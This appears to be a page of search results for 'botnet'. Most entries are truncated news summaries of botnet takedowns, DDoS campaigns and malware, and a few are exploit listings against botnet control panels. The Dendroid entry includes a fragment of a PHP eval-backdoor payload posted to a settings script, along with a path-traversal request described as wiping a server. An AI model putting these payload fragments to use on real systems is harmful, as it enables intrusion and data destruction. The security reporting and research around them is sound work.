1841 matches found
Zemra Botnet CnC Web Panel Remote Code Execution
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Zemra Botnet CnC Web Panel Remote Code Execution', 'Description' = %q This module exploits the CnC web panel of Zemra Botnet which...
Zemra Botnet CnC Web Panel Remote Code Execution
This module exploits the CnC web panel of Zemra Botnet which contains a backdoor inside its leaked source code. Zemra is a crimeware bot that can be used to conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra. This module requires Metasploit: https://metasploit.com/download Current...
New Botnet Hunts for Linux — Launching 20 DDoS Attacks/Day at 150Gbps
A network of compromised Linux servers has grown so powerful that it can blow large websites off the Internet by launching crippling distributed denial-of-service (DDoS) attacks of over 150 gigabits per second (Gbps). The distributed denial-of-service network, dubbed XOR DDoS Botnet, targets over 20...
Dendroid botnet Remote Code Execution Vulnerability
Bonus to remotely wipe the whole server: /deletepics.php?uid=../../Panel/ import requests Add URL Set a PHP payload Go to http://website/config.php URL = 'http://localhost/Panel/applysettings.php' PAYLOAD = "isset$GET'tapz' ? eval$GET'tapz' : '" data = 'dbhost' : 'localhost', 'dbname' : 'dendroid...
Google Report Outlines Dependencies in the For-Profit Cybercrime Food Chain
Security specialists need to change the game and shift gears, researchers argue – instead of focusing on protecting their users and systems, they should narrow their sights on trying to shake up cybercrime’s seedy underbelly. At least that’s how Kurt Thomas and Elie Bursztein, researchers at...
Spam Campaign Continuing to Serve Up Malicious .js Files
A malicious spam campaign that’s been doling out zipped Javascript .js files remains an issue, the SANS Internet Storm Center warns. The campaign was spotted earlier this year, but Brad Duncan, a handler for the site and researcher with Rackspace’s information security operations center, claims...
Google Image CSRF Vulnerability & Using it as a Botnet
Exploit for php platform in category web applications / Exploit Title: Google Image CSRF Vulnerability & Using it as a Botnet Exploit Author: C4T Vendor Homepage : http://images.google.com Google Dork: none Tested on: Linux & Windows ====================================================== Google...
Pineapple 2.3.0 Autopwn Script
I wrote the PoC half a year ago, because I needed to try it on my Chinese router, and it still works on freshly purchased pineapple devices. Hello from Defcon ; And guys, it’s not a talk for the defcon, especially if you have done a botnet based on that shit… ; See ya tomorrow at WiFi village...
Updated DGA Changer Malware Generates Fake Domain Stream
LAS VEGAS — The group behind the DGA Changer downloader has been pretty adept in modifying the malware to elude sandbox detection in particular. Researchers at Seculert today published a report on the latest twist to DGA Changer, which now is able to generate a fake stream of domains if it detect...
Malware And Hacking Forum Seized, Dozens Arrested
The FBI and other law enforcement agencies have arrested more than 70 people suspected of carrying out cyber criminal activities associated with one of the most active underground web forums known as Darkode. Darkode, also used by the notorious Lizard Squad, was an online bazaar for cyber criminals...
Europol Arrests Gang Behind Zeus And SpyEye Banking Malware
Law enforcement agencies from six different European countries have taken down a major Ukrainian-based cybercriminal gang suspected of developing, distributing and deploying Zeus and SpyEye banking malware. According to the report on the official website of Europol, authorities have arreste...
Adware-Laden Skype Botnet Disrupted
Skype, Microsoft’s now ubiquitous video/messenger program, has long been a go-to destination for attackers looking to peddle their malware. The latest campaign to leverage the software – a botnet circulating adware, composed entirely of Skype users – was recently disrupted by researchers. Ronnie...
Researchers: Patch Incomplete for Hola VPN Vulnerabilities
Hola, a popular, free, peer-to-peer service that enables anonymous surfing and access to blocked online resources, said today it has patched vulnerabilities discovered last week that expose its millions of users to possible code execution, remote monitoring and other threats to privacy and...
Hola — A widely popular Free VPN service used as a Giant Botnet
The bandwidth of millions of users of a popular free VPN service is being sold without their knowledge in an attempt to cover the cost of its free service, which could result in a vast botnet-for-sale network. "Hola," a free virtual private network, is designed to help people abroad watch...
DDoS Botnet Leverages Thousands of Insecure SOHO Routers
Small office and home office (SOHO) routers are an increasingly common target for cybercriminals, not because of any vulnerability, but because most routers are loosely managed and often deployed with default administrator credentials. A new report suggests that hackers are using a large botnet of te...
Default Credentials Lead to Massive DDoS-For-Hire Botnet
Tens of thousands of home and office-based routers have been hijacked over the last several months to form a botnet used to stage a DDoS campaign. The attacks first surfaced at the tail end of last year, around Dec. 29, and after a short reprieve, spiked twofold over the last month. The web...
Elasticsearch Elastichoney Honeypot Shows 8,000 RCE Attacks
Hackers have taken an interest in Elasticsearch, a popular enterprise search engine. A researcher based in Texas, whose own Elasticsearch server was hacked, today published results collated from a honeypot he built to get a sense of how widespread attacks are against the vulnerability that did in...
Legend Perl IRC Bot - Remote Code Execution
Legend Perl IRC Bot - Remote Code Execution legendrce.py Legend Perl IRC Bot Remote Code Execution PoC author: Jay Turla @shipcod3 description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. reference:...
Beebone Botnet Taken Down By International Cybercrime Taskforce
U.S. and European law enforcement agencies have shut down a highly sophisticated piece of the botnet that had infected more than 12,000 computers worldwide, allowing hackers to steal victims’ banking information and other sensitive data. The law enforcement agencies from the United States, United...
Beebone Botnet Takedown Carried Out
A relatively small yet troublesome botnet has been shut down in a joint operation between U.S. and European law enforcement and a number of private security companies, including Kaspersky Lab. The takedown of Beebone was carried out on Wednesday by the FBI, the Department of Homeland Security,...